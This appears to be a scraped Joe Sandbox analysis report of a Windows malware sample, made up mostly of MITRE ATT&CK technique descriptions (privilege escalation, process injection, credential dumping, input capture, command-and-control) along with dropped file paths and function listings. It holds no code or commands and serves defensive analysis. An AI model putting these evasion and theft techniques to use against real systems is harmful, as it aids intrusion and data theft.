Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tfWjjV1LdT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\10O4645j

C:\Users\user\AppData\Local\Temp\autE986.tmp

C:\Users\user\AppData\Local\Temp\batchers

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
tfWjjV1LdT.exe

Function 00693B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 006949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00694E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 006F9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00693015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00693041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0069708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00693633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00693A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00693766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0069F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 00D53210 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00D52FD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre